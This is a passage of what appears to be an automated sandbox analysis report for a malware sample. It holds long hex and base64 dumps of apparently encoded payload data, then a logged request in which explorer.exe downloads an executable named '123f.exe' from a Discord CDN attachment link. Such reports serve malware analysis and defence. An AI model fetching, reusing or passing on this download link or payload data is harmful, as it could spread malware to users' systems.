6e 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 48 00 51 00 31 00 42 00 46 00 54 00
                                                                                                                                                                                                  Data Ascii: NBeEdGN2tCVmFZQUFBQUFoZ2k0REZBWHVRRmVwZ0FBQUFDR0NCSU9XeGU2QVdhbUFBQUFBSVlJR2c1bEY3b0JiNllBQUFBQWhnanBEbkFYdXdGM3BnQUFBQUNHQ1BFT
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC188INData Raw: 5a 00 7a 00 46 00 43 00 65 00 45 00 46 00 42 00 4e 00 46 00 46 00 49 00 53 00 6e 00 46 00 52 00 51 00 55 00 46 00 42 00 51 00 55 00 4e 00 48 00 51 00 30 00 4e 00 56 00 53 00 6e 00 6c 00 52 00 52 00 47 00 6c 00 42 00 5a 00 45 00 64 00 77 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 4a 00 57 00 55 00 6c 00 4d 00 5a 00 32 00 74 00 52 00 51 00 55 00 39 00 4a 00 51 00 6a 00 4a 00 78 00 61 00 30 00 46 00 42 00 51 00 55 00 46 00 42 00 61 00 47 00 64 00 70 00 65 00 45 00 4e 00 34 00 63 00 30 00 45 00 30 00 64 00 30 00 68 00 70 00 63 00 56 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 30 00 64 00 44 00 54 00 47 00 39 00 4d 00 56 00 6b 00 46 00 59 00 61 00 6b 00 46 00 6c 00 64 00 58 00 42 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 6c 00 5a 00 53 00 56 00 68 00 55
                                                                                                                                                                                                  Data Ascii: ZzFCeEFBNFFISnFRQUFBQUNHQ0NVSnlRRGlBZEdwQUFBQUFJWUlMZ2tRQU9JQjJxa0FBQUFBaGdpeEN4c0E0d0hpcVFBQUFBQ0dDTG9MVkFYakFldXBBQUFBQUlZSVhU
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC192INData Raw: 00 48 00 55 00 46 00 46 00 36 00 51 00 56 00 46 00 43 00 63 00 30 00 46 00 71 00 63 00 58 00 56 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 6c 00 4e 00 51 00 54 00 52 00 6e 00 53 00 45 00 35 00 42 00 52 00 33 00 64 00 44 00 5a 00 6b 00 73 00 30 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 6e 00 64 00 30 00 49 00 79 00 51 00 58 00 63 00 34 00 57 00 6d 00 4a 00 52 00 54 00 46 00 5a 00 79 00 5a 00 30 00 46 00 42 00 51 00 55 00 46 00 44 00 55 00 6b 00 64 00 43 00 5a 00 7a 00 41 00 30 00 51 00 6c 00 4a 00 31 00 51 00 58 00 56 00 48 00 64 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 53 00 56 00 6c 00 5a 00 4f 00 55 00 52 00 4e 00 51 00 6b 00 46 00 48 00 4e 00 45 00 4d 00 32 00 59 00 54 00 52 00 42 00 51 00 55 00 46 00 42 00 51 00 57 00 64 00 33 00 51 00 6e 00
                                                                                                                                                                                                  Data Ascii: HUFF6QVFCc0FqcXVBQUFBQUlNQTRnSE5BR3dDZks0QUFBQUFnd0IyQXc4WmJRTFZyZ0FBQUFDUkdCZzA0QlJ1QXVHdUFBQUFBSVlZOURNQkFHNEM2YTRBQUFBQWd3Qn
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC197INData Raw: 55 00 46 00 42 00 51 00 56 00 46 00 44 00 62 00 6b 00 78 00 6e 00 51 00 55 00 46 00 42 00 5a 00 30 00 46 00 33 00 54 00 30 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 7a 00 56 00 51 00 55 00 55 00 46 00 42 00 51 00 56 00 46 00 44 00 62 00 6b 00 78 00 6e 00 51 00 55 00 46 00 42 00 5a 00 30 00 46 00 33 00 54 00 30 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 7a 00 56 00 51 00 55 00 55 00 46 00 42 00 51 00 56 00 46 00 44 00 62 00 6b 00 78 00 6e 00 51 00 55 00 46 00 42 00 5a 00 30 00 46 00 33 00 54 00 30 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 7a 00 56 00 51 00 55 00 55 00 46 00 42 00 51 00 56 00 46 00 44 00 62 00 6b 00 78 00 6e 00 51 00 55 00 46 00 42 00 5a 00 30 00 46 00 33 00 54 00 30 00 46 00 42 00 51 00 55 00 46 00 33 00 51 00 7a 00 56 00 51 00 55
                                                                                                                                                                                                  Data Ascii: UFBQVFDbkxnQUFBZ0F3T0FBQUF3QzVQUUFBQVFDbkxnQUFBZ0F3T0FBQUF3QzVQUUFBQVFDbkxnQUFBZ0F3T0FBQUF3QzVQUUFBQVFDbkxnQUFBZ0F3T0FBQUF3QzVQU
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC201INData Raw: 00 51 00 56 00 46 00 43 00 63 00 45 00 39 00 6e 00 51 00 55 00 46 00 42 00 55 00 55 00 52 00 6d 00 54 00 32 00 64 00 42 00 51 00 55 00 46 00 52 00 51 00 6d 00 70 00 4f 00 5a 00 30 00 46 00 42 00 51 00 56 00 46 00 43 00 61 00 6b 00 35 00 6e 00 51 00 55 00 46 00 42 00 55 00 55 00 4a 00 71 00 54 00 6d 00 64 00 42 00 51 00 55 00 46 00 52 00 51 00 56 00 64 00 50 00 64 00 30 00 46 00 42 00 51 00 56 00 46 00 43 00 61 00 6b 00 35 00 6e 00 51 00 55 00 46 00 42 00 55 00 55 00 4a 00 71 00 54 00 6d 00 64 00 42 00 51 00 55 00 46 00 52 00 51 00 6d 00 70 00 4f 00 5a 00 30 00 46 00 42 00 51 00 56 00 46 00 43 00 61 00 6b 00 35 00 6e 00 51 00 55 00 46 00 42 00 55 00 55 00 52 00 6d 00 54 00 57 00 64 00 42 00 51 00 55 00 46 00 52 00 52 00 47 00 5a 00 4e 00 5a 00 30 00 46 00
                                                                                                                                                                                                  Data Ascii: QVFCcE9nQUFBUURmT2dBQUFRQmpOZ0FBQVFCak5nQUFBUUJqTmdBQUFRQVdPd0FBQVFCak5nQUFBUUJqTmdBQUFRQmpOZ0FBQVFCak5nQUFBUURmTWdBQUFRRGZNZ0F
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC205INData Raw: 64 00 43 00 52 00 30 00 68 00 52 00 51 00 55 00 46 00 42 00 55 00 55 00 52 00 78 00 55 00 56 00 46 00 42 00 51 00 55 00 46 00 6e 00 51 00 6b 00 46 00 52 00 51 00 55 00 46 00 42 00 51 00 58 00 64 00 42 00 4e 00 46 00 46 00 42 00 51 00 55 00 46 00 43 00 51 00 55 00 4e 00 6d 00 54 00 48 00 64 00 42 00 51 00 55 00 4a 00 52 00 51 00 6c 00 68 00 48 00 55 00 55 00 46 00 42 00 51 00 6d 00 64 00 43 00 55 00 30 00 64 00 52 00 51 00 55 00 46 00 43 00 64 00 30 00 4a 00 59 00 55 00 55 00 46 00 42 00 51 00 55 00 4e 00 42 00 51 00 6b 00 39 00 52 00 51 00 55 00 46 00 42 00 51 00 31 00 46 00 44 00 55 00 46 00 42 00 52 00 51 00 55 00 46 00 44 00 5a 00 30 00 46 00 68 00 54 00 30 00 46 00 42 00 51 00 55 00 46 00 52 00 52 00 48 00 46 00 52 00 55 00 55 00 46 00 42 00 51 00 57
                                                                                                                                                                                                  Data Ascii: dCR0hRQUFBUURxUVFBQUFnQkFRQUFBQXdBNFFBQUFCQUNmTHdBQUJRQlhHUUFBQmdCU0dRQUFCd0JYUUFBQUNBQk9RQUFBQ1FDUFBRQUFDZ0FhT0FBQUFRRHFRUUFBQW
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC208INData Raw: 00 54 00 46 00 46 00 51 00 54 00 6c 00 45 00 54 00 55 00 4a 00 42 00 51 00 6b 00 56 00 45 00 54 00 6b 00 52 00 5a 00 63 00 45 00 45 00 34 00 52 00 55 00 45 00 35 00 52 00 45 00 31 00 52 00 51 00 55 00 31 00 72 00 51 00 31 00 68 00 44 00 52 00 45 00 70 00 42 00 53 00 6c 00 46 00 42 00 4f 00 55 00 52 00 50 00 4e 00 55 00 46 00 7a 00 52 00 55 00 4e 00 51 00 61 00 6a 00 46 00 51 00 51 00 54 00 68 00 72 00 51 00 30 00 4e 00 36 00 64 00 32 00 4a 00 42 00 54 00 55 00 56 00 42 00 65 00 6e 00 70 00 57 00 4b 00 30 00 45 00 34 00 52 00 55 00 46 00 36 00 65 00 6c 00 64 00 47 00 51 00 54 00 68 00 72 00 51 00 57 00 68 00 6f 00 62 00 31 00 46 00 42 00 54 00 47 00 74 00 42 00 51 00 33 00 67 00 72 00 54 00 45 00 46 00 34 00 52 00 55 00 52 00 54 00 52 00 55 00 39 00 53 00
                                                                                                                                                                                                  Data Ascii: TFFQTlETUJBQkVETkRZcEE4RUE5RE1RQU1rQ1hDREpBSlFBOURPNUFzRUNQajFQQThrQ0N6d2JBTUVBenpWK0E4RUF6eldGQThrQWhob1FBTGtBQ3grTEF4RURTRU9S
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC212INData Raw: 46 00 51 00 6d 00 52 00 44 00 59 00 57 00 74 00 44 00 4f 00 47 00 74 00 43 00 4f 00 55 00 52 00 4e 00 51 00 6b 00 46 00 4e 00 61 00 30 00 4a 00 4a 00 51 00 32 00 74 00 47 00 51 00 55 00 31 00 72 00 51 00 6c 00 4a 00 45 00 4d 00 45 00 5a 00 42 00 54 00 57 00 74 00 43 00 55 00 58 00 6c 00 6c 00 65 00 6b 00 4d 00 34 00 61 00 30 00 4a 00 50 00 55 00 32 00 55 00 32 00 51 00 79 00 74 00 72 00 51 00 6c 00 42 00 53 00 4d 00 30 00 5a 00 44 00 4b 00 32 00 74 00 43 00 4e 00 56 00 4a 00 75 00 54 00 55 00 4d 00 72 00 61 00 30 00 56 00 4b 00 61 00 44 00 4e 00 52 00 51 00 79 00 74 00 72 00 51 00 6a 00 4a 00 6f 00 62 00 6c 00 64 00 44 00 4b 00 32 00 74 00 43 00 51 00 33 00 6c 00 4e 00 51 00 6b 00 46 00 51 00 52 00 55 00 56 00 50 00 55 00 33 00 70 00 72 00 51 00 79 00 39
                                                                                                                                                                                                  Data Ascii: FQmRDYWtDOGtCOURNQkFNa0JJQ2tGQU1rQlJEMEZBTWtCUXllekM4a0JPU2U2QytrQlBSM0ZDK2tCNVJuTUMra0VKaDNRQytrQjJobldDK2tCQ3lNQkFQRUVPU3prQy9
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC228INData Raw: 42 00 51 00 55 00 68 00 33 00 64 00 45 00 52 00 48 00 55 00 55 00 46 00 42 00 64 00 6b 00 46 00 34 00 52 00 45 00 64 00 52 00 51 00 55 00 46 00 49 00 5a 00 7a 00 56 00 45 00 52 00 31 00 46 00 42 00 51 00 54 00 6c 00 52 00 4e 00 55 00 52 00 48 00 55 00 55 00 46 00 42 00 4d 00 32 00 68 00 43 00 52 00 45 00 64 00 52 00 51 00 55 00 46 00 58 00 61 00 45 00 5a 00 45 00 52 00 31 00 46 00 42 00 51 00 55 00 74 00 33 00 51 00 57 00 35 00 48 00 55 00 55 00 46 00 42 00 53 00 6e 00 64 00 4e 00 62 00 6b 00 64 00 52 00 51 00 55 00 45 00 78 00 55 00 56 00 46 00 75 00 52 00 31 00 46 00 42 00 51 00 55 00 39 00 52 00 5a 00 43 00 74 00 48 00 55 00 55 00 46 00 42 00 56 00 58 00 64 00 52 00 62 00 6b 00 64 00 52 00 51 00 55 00 45 00 7a 00 5a 00 31 00 6c 00 75 00 52 00 31 00 46
                                                                                                                                                                                                  Data Ascii: BQUh3dERHUUFBdkF4REdRQUFIZzVER1FBQTlRNURHUUFBM2hCREdRQUFXaEZER1FBQUt3QW5HUUFBSndNbkdRQUExUVFuR1FBQU9RZCtHUUFBVXdRbkdRQUEzZ1luR1F
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC240INData Raw: 00 30 00 56 00 30 00 54 00 56 00 52 00 57 00 4f 00 55 00 68 00 61 00 57 00 46 00 4a 00 55 00 5a 00 45 00 68 00 4b 00 63 00 47 00 4a 00 74 00 5a 00 44 00 68 00 4e 00 56 00 45 00 5a 00 6d 00 54 00 55 00 46 00 42 00 4f 00 46 00 42 00 71 00 62 00 47 00 5a 00 59 00 65 00 6b 00 5a 00 6d 00 54 00 55 00 46 00 42 00 4f 00 46 00 56 00 75 00 56 00 6e 00 56 00 51 00 62 00 55 00 70 00 6d 00 57 00 48 00 70 00 47 00 5a 00 6b 00 31 00 42 00 51 00 54 00 68 00 53 00 4d 00 6c 00 59 00 77 00 55 00 6b 00 64 00 57 00 62 00 56 00 6c 00 59 00 56 00 6e 00 4e 00 6b 00 52 00 57 00 78 00 52 00 5a 00 47 00 70 00 53 00 51 00 6c 00 70 00 48 00 55 00 6e 00 6c 00 61 00 57 00 45 00 35 00 36 00 55 00 47 00 31 00 4b 00 5a 00 6c 00 68 00 36 00 52 00 6d 00 5a 00 4e 00 51 00 55 00 45 00 34 00
                                                                                                                                                                                                  Data Ascii: 0V0TVRWOUhaWFJUZEhKcGJtZDhNVEZmTUFBOFBqbGZYekZmTUFBOFVuVnVQbUpmWHpGZk1BQThSMlYwUkdWbVlYVnNkRWxRZGpSQlpHUnlaWE56UG1KZlh6RmZNQUE4
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC256INData Raw: 00 6c 00 56 00 4e 00 4e 00 46 00 4a 00 71 00 51 00 58 00 70 00 53 00 61 00 6d 00 52 00 43 00 55 00 6b 00 52 00 42 00 65 00 46 00 4a 00 55 00 5a 00 7a 00 56 00 50 00 56 00 46 00 4a 00 44 00 51 00 55 00 52 00 57 00 51 00 31 00 46 00 71 00 54 00 54 00 4e 00 50 00 52 00 47 00 68 00 43 00 54 00 56 00 52 00 72 00 4d 00 31 00 46 00 36 00 53 00 54 00 4a 00 52 00 61 00 6d 00 64 00 36 00 54 00 56 00 52 00 42 00 65 00 45 00 35 00 55 00 62 00 45 00 5a 00 52 00 65 00 6d 00 78 00 43 00 54 00 30 00 52 00 46 00 4d 00 6b 00 31 00 36 00 56 00 54 00 52 00 4e 00 56 00 46 00 4a 00 43 00 55 00 57 00 74 00 4a 00 64 00 30 00 35 00 56 00 53 00 55 00 46 00 4e 00 52 00 46 00 46 00 34 00 54 00 55 00 52 00 4a 00 4d 00 30 00 34 00 77 00 54 00 58 00 68 00 4f 00 56 00 55 00 35 00 43 00
                                                                                                                                                                                                  Data Ascii: lVNNFJqQXpSamRCUkRBeFJUZzVPVFJDQURWQ1FqTTNPRGhCTVRrM1F6STJRamd6TVRBeE5UbEZRemxCT0RFMk16VTRNVFJCUWtJd05VSUFNRFF4TURJM04wTXhOVU5C
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC272INData Raw: 00 6d 00 35 00 53 00 65 00 56 00 6c 00 58 00 54 00 6a 00 42 00 52 00 57 00 46 00 49 00 77 00 59 00 32 00 31 00 73 00 61 00 57 00 52 00 59 00 55 00 6d 00 78 00 42 00 52 00 6b 00 35 00 73 00 59 00 32 00 35 00 61 00 63 00 46 00 6b 00 79 00 56 00 6b 00 52 00 69 00 4d 00 6a 00 55 00 77 00 59 00 32 00 31 00 47 00 61 00 6d 00 52 00 46 00 52 00 6a 00 42 00 6b 00 53 00 45 00 70 00 77 00 57 00 57 00 35 00 57 00 4d 00 46 00 70 00 52 00 51 00 6c 00 42 00 6a 00 52 00 31 00 5a 00 35 00 57 00 56 00 68 00 53 00 63 00 47 00 49 00 79 00 4e 00 55 00 52 00 69 00 4d 00 6a 00 55 00 77 00 59 00 32 00 31 00 47 00 61 00 6d 00 52 00 46 00 52 00 6a 00 42 00 6b 00 53 00 45 00 70 00 77 00 57 00 57 00 35 00 57 00 4d 00 46 00 70 00 52 00 51 00 6c 00 46 00 5a 00 57 00 45 00 70 00 6f 00
                                                                                                                                                                                                  Data Ascii: m5SeVlXTjBRWFIwY21saWRYUmxBRk5sY25acFkyVkRiMjUwY21GamRFRjBkSEpwWW5WMFpRQlBjR1Z5WVhScGIyNURiMjUwY21GamRFRjBkSEpwWW5WMFpRQlFZWEpo
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC288INData Raw: 00 6b 00 64 00 34 00 51 00 32 00 56 00 59 00 55 00 6d 00 78 00 6a 00 64 00 30 00 4a 00 45 00 59 00 6a 00 49 00 31 00 4d 00 6c 00 70 00 59 00 53 00 6a 00 42 00 57 00 52 00 7a 00 6c 00 44 00 5a 00 56 00 68 00 53 00 62 00 47 00 4e 00 33 00 51 00 6b 00 68 00 61 00 57 00 46 00 4a 00 44 00 5a 00 56 00 68 00 53 00 62 00 47 00 4e 00 33 00 51 00 6d 00 6c 00 6c 00 57 00 46 00 4a 00 73 00 59 00 33 00 64 00 43 00 53 00 46 00 70 00 59 00 55 00 6b 00 31 00 69 00 4d 00 6d 00 52 00 77 00 57 00 54 00 4a 00 47 00 63 00 31 00 4a 00 49 00 53 00 6e 00 42 00 6b 00 62 00 56 00 5a 00 36 00 51 00 55 00 56 00 4f 00 56 00 47 00 46 00 48 00 52 00 6e 00 6c 00 6a 00 52 00 55 00 5a 00 35 00 57 00 6a 00 4e 00 57 00 64 00 46 00 70 00 58 00 4e 00 54 00 42 00 54 00 56 00 7a 00 56 00 74 00
                                                                                                                                                                                                  Data Ascii: kd4Q2VYUmxjd0JEYjI1MlpYSjBWRzlDZVhSbGN3QkhaWFJDZVhSbGN3QmllWFJsY3dCSFpYUk1iMmRwWTJGc1JISnBkbVZ6QUVOVGFHRnljRUZ5WjNWdFpXNTBTVzVt
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC304INData Raw: 00 55 00 63 00 34 00 51 00 57 00 4e 00 6e 00 51 00 6e 00 42 00 42 00 53 00 46 00 46 00 42 00 59 00 55 00 46 00 43 00 64 00 45 00 46 00 47 00 51 00 55 00 46 00 6a 00 5a 00 30 00 4a 00 32 00 51 00 55 00 68 00 5a 00 51 00 57 00 46 00 52 00 51 00 6b 00 35 00 42 00 52 00 31 00 56 00 42 00 59 00 6c 00 46 00 43 00 64 00 6b 00 46 00 49 00 53 00 55 00 46 00 6c 00 55 00 55 00 4a 00 55 00 51 00 55 00 68 00 52 00 51 00 57 00 4e 00 6e 00 51 00 6d 00 78 00 42 00 52 00 30 00 56 00 42 00 59 00 6c 00 46 00 43 00 61 00 30 00 46 00 48 00 56 00 55 00 46 00 6a 00 5a 00 30 00 46 00 42 00 52 00 31 00 55 00 77 00 51 00 56 00 70 00 52 00 51 00 6e 00 52 00 42 00 52 00 7a 00 68 00 42 00 59 00 32 00 64 00 43 00 4e 00 55 00 46 00 47 00 54 00 55 00 46 00 6b 00 51 00 55 00 4a 00 35 00
                                                                                                                                                                                                  Data Ascii: Uc4QWNnQnBBSFFBYUFCdEFGQUFjZ0J2QUhZQWFRQk5BR1VBYlFCdkFISUFlUUJUQUhRQWNnQmxBR0VBYlFCa0FHVUFjZ0FBR1UwQVpRQnRBRzhBY2dCNUFGTUFkQUJ5
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC320INData Raw: 00 6e 00 68 00 56 00 55 00 30 00 78 00 52 00 52 00 56 00 4e 00 6e 00 54 00 57 00 64 00 48 00 52 00 6c 00 4a 00 4b 00 53 00 6b 00 46 00 6e 00 4e 00 45 00 39 00 43 00 55 00 30 00 46 00 44 00 51 00 56 00 4a 00 33 00 57 00 55 00 64 00 53 00 51 00 55 00 4e 00 42 00 61 00 46 00 56 00 54 00 5a 00 30 00 74 00 56 00 51 00 6b 00 68 00 6e 00 52 00 56 00 5a 00 46 00 62 00 30 00 4e 00 73 00 51 00 56 00 49 00 30 00 51 00 55 00 5a 00 53 00 53 00 6b 00 70 00 42 00 61 00 44 00 52 00 42 00 53 00 47 00 64 00 46 00 52 00 55 00 4e 00 6e 00 53 00 55 00 39 00 45 00 5a 00 31 00 6c 00 57 00 52 00 57 00 39 00 44 00 62 00 45 00 46 00 52 00 4e 00 45 00 5a 00 47 00 55 00 6b 00 6b 00 78 00 51 00 56 00 45 00 30 00 51 00 30 00 4a 00 6e 00 4e 00 45 00 5a 00 4a 00 51 00 55 00 6c 00 50 00
                                                                                                                                                                                                  Data Ascii: nhVU0xRRVNnTWdHRlJKSkFnNE9CU0FDQVJ3WUdSQUNBaFVTZ0tVQkhnRVZFb0NsQVI0QUZSSkpBaDRBSGdFRUNnSU9EZ1lWRW9DbEFRNEZGUkkxQVE0Q0JnNEZJQUlP
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC336INData Raw: 00 57 00 74 00 72 00 51 00 30 00 5a 00 53 00 53 00 58 00 52 00 42 00 55 00 6b 00 74 00 42 00 4d 00 45 00 46 00 4a 00 52 00 55 00 4a 00 6f 00 53 00 30 00 4a 00 4a 00 51 00 56 00 46 00 48 00 52 00 57 00 39 00 47 00 51 00 55 00 4a 00 42 00 57 00 56 00 4e 00 6e 00 53 00 54 00 42 00 46 00 51 00 6d 00 68 00 4c 00 51 00 57 00 78 00 53 00 51 00 55 00 64 00 47 00 55 00 6b 00 74 00 42 00 62 00 56 00 46 00 46 00 56 00 6b 00 56 00 76 00 51 00 32 00 52 00 42 00 65 00 45 00 74 00 42 00 62 00 31 00 4a 00 33 00 59 00 30 00 56 00 42 00 57 00 56 00 5a 00 46 00 62 00 30 00 4e 00 61 00 51 00 56 00 4a 00 56 00 55 00 32 00 64 00 4b 00 4d 00 45 00 52 00 46 00 62 00 30 00 4e 00 6f 00 53 00 45 00 45 00 30 00 52 00 55 00 4a 00 6f 00 53 00 30 00 4a 00 57 00 51 00 54 00 42 00 48 00
                                                                                                                                                                                                  Data Ascii: WtrQ0ZSSXRBUktBMEFJRUJoS0JJQVFHRW9GQUJBWVNnSTBFQmhLQWxSQUdGUktBbVFFVkVvQ2RBeEtBb1J3Y0VBWVZFb0NaQVJVU2dKMERFb0NoSEE0RUJoS0JWQTBH
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC352INData Raw: 00 55 00 68 00 42 00 51 00 57 00 4a 00 42 00 51 00 6d 00 68 00 42 00 53 00 47 00 74 00 42 00 56 00 47 00 64 00 43 00 61 00 45 00 46 00 48 00 4d 00 45 00 46 00 61 00 55 00 55 00 46 00 42 00 51 00 55 00 64 00 6e 00 51 00 57 00 4a 00 33 00 51 00 6e 00 70 00 42 00 53 00 46 00 46 00 42 00 57 00 48 00 64 00 43 00 63 00 6b 00 46 00 48 00 56 00 55 00 46 00 6c 00 55 00 55 00 4a 00 50 00 51 00 55 00 64 00 46 00 51 00 57 00 4a 00 52 00 51 00 6d 00 78 00 42 00 53 00 46 00 46 00 42 00 57 00 6b 00 46 00 43 00 61 00 45 00 46 00 49 00 55 00 55 00 46 00 5a 00 55 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 55 00 46 00 42 00 51 00 6c 00 52 00 42 00 52 00 56 00 56 00 42 00 56 00 45 00 46 00 43 00 52 00 6b 00 46 00 46 00 54 00 55 00 46 00 57 00 51 00 55 00 46 00 6e 00
                                                                                                                                                                                                  Data Ascii: UhBQWJBQmhBSGtBVGdCaEFHMEFaUUFBQUdnQWJ3QnpBSFFBWHdCckFHVUFlUUJPQUdFQWJRQmxBSFFBWkFCaEFIUUFZUUFBQUFBQUFBQlRBRVVBVEFCRkFFTUFWQUFn
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC368INData Raw: 00 55 00 5a 00 33 00 51 00 56 00 5a 00 52 00 51 00 6c 00 52 00 42 00 53 00 46 00 46 00 42 00 59 00 32 00 64 00 43 00 63 00 45 00 46 00 48 00 4e 00 45 00 46 00 61 00 64 00 30 00 46 00 31 00 51 00 55 00 5a 00 4a 00 51 00 56 00 70 00 52 00 51 00 6e 00 64 00 42 00 52 00 33 00 64 00 42 00 57 00 56 00 46 00 43 00 61 00 6b 00 46 00 48 00 56 00 55 00 46 00 6a 00 64 00 30 00 4a 00 73 00 51 00 55 00 68 00 4a 00 51 00 57 00 4a 00 6e 00 51 00 6d 00 68 00 42 00 52 00 7a 00 42 00 42 00 57 00 6c 00 46 00 43 00 59 00 30 00 46 00 47 00 4d 00 45 00 46 00 4d 00 64 00 30 00 49 00 79 00 51 00 55 00 64 00 46 00 51 00 56 00 56 00 33 00 51 00 6a 00 42 00 42 00 53 00 45 00 6c 00 42 00 59 00 56 00 46 00 43 00 64 00 55 00 46 00 48 00 59 00 30 00 46 00 4d 00 5a 00 30 00 4a 00 54 00
                                                                                                                                                                                                  Data Ascii: UZ3QVZRQlRBSFFBY2dCcEFHNEFad0F1QUZJQVpRQndBR3dBWVFCakFHVUFjd0JsQUhJQWJnQmhBRzBBWlFCY0FGMEFMd0IyQUdFQVV3QjBBSElBYVFCdUFHY0FMZ0JT
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC384INData Raw: 00 30 00 59 00 77 00 56 00 6d 00 6c 00 31 00 59 00 55 00 4a 00 4a 00 55 00 32 00 77 00 7a 00 5a 00 54 00 46 00 52 00 64 00 46 00 68 00 75 00 59 00 6b 00 78 00 7a 00 62 00 56 00 6c 00 5a 00 53 00 58 00 56 00 78 00 54 00 6b 00 6f 00 30 00 61 00 45 00 55 00 7a 00 51 00 33 00 4e 00 43 00 51 00 6c 00 4d 00 30 00 5a 00 31 00 4a 00 69 00 64 00 31 00 70 00 4d 00 4d 00 57 00 78 00 33 00 4c 00 32 00 74 00 4e 00 54 00 45 00 39 00 5a 00 54 00 30 00 64 00 34 00 65 00 45 00 68 00 6f 00 62 00 44 00 67 00 78 00 5a 00 57 00 35 00 55 00 65 00 6c 00 52 00 5a 00 4f 00 56 00 46 00 53 00 53 00 33 00 4a 00 58 00 65 00 55 00 56 00 4a 00 55 00 32 00 31 00 36 00 64 00 6b 00 39 00 71 00 56 00 55 00 70 00 42 00 4d 00 46 00 5a 00 30 00 4d 00 46 00 6f 00 78 00 5a 00 55 00 4a 00 7a 00
                                                                                                                                                                                                  Data Ascii: 0YwVml1YUJJU2wzZTFRdFhuYkxzbVlZSXVxTko0aEUzQ3NCQlM0Z1Jid1pMMWx3L2tNTE9ZT0d4eEhobDgxZW5UelRZOVFSS3JXeUVJU216dk9qVUpBMFZ0MFoxZUJz


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  1192.168.2.749802162.159.130.233443C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC391OUTGET /attachments/903028136416002089/910600430113931304/123f.exe HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Host: cdn.discordapp.com
                                                                                                                                                                                                  2021-11-18 09:30:32 UTC391INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:32 GMT
                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                  Content-Length: 2897408
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  CF-Ray: 6b002e41deea4e5b-FRA
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Age: 53312
                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                  Content-Disposition: attachment;%20filename=123f.exe
                                                                                                                                                                                                  ETag: "a77f1ed5881d44fc95bf3da05c349385"
                                                                                                                                                                                                  Expires: Fri, 18 Nov 2022 09:30:32 GMT
                                                                                                                                                                                                  Last-Modified: Wed, 17 Nov 2021 18:41:00 GMT
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                  x-goog-generation: 1637174460770077
                                                                                                                                                                                                  x-goog-hash: crc32c=Juu6Zw==
                                                                                                                                                                                                  x-goog-hash: md5=p38e1YgdRPyVvz2gXDSThQ==
                                                                                                                                                                                                  x-goog-metageneration: 1
                                                                                                                                                                                                  x-goog-storage-class: STANDARD
                                                                                                                                                                                                  x-goog-stored-content-encoding: identity
                                                                                                                                                                                                  x-goog-stored-content-length: 2897408
                                                                                                                                                                                                  X-GUploader-UploadID: ADPycdvREhJkGGYrEoWXB6Gmy3jl-cN4Q_HoOLH8oncCQd10wSf3IStuOdwc_nBum9dYSl1duqBnpMC9n72stRF1sn4
                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
